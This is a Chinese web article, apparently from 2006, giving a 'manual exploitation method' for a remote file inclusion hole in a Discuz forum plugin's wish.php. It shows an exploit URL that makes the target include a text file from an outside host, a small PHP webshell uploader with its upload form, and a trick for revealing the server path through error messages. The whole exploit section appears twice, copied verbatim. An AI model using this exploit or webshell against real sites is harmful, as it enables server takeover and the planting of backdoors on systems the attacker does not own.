discuz許愿池插件遠程包含漏洞
更新時間:2006年11月06日 00:00:00 作者:
許愿池插件的wish.php文件出的問題:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
遠程包含漏洞,變量discuz_root過濾不嚴,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后綴,可以改為任意后綴,后面一定要記得加問號。
這里xxxx.txt用CN.Tink的那個小馬寫個shell進去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
網(wǎng)站物理路徑可以通過提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看錯誤提示信息,然后修改xxxx.txt中的路徑即可。 guizai.php就是你上傳的shell的名字。
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
遠程包含漏洞,變量discuz_root過濾不嚴,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后綴,可以改為任意后綴,后面一定要記得加問號。
這里xxxx.txt用CN.Tink的那個小馬寫個shell進去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
網(wǎng)站物理路徑可以通過提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看錯誤提示信息,然后修改xxxx.txt中的路徑即可。 guizai.php就是你上傳的shell的名字。
相關(guān)文章
跨站式腳本(Cross-SiteScripting)XSS攻擊原理分析
XSS又叫CSS (Cross Site Script) ,跨站腳本攻擊。它指的是惡意攻擊者往Web頁面里插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執(zhí)行,從而達到惡意用戶的特殊目的。2008-09-09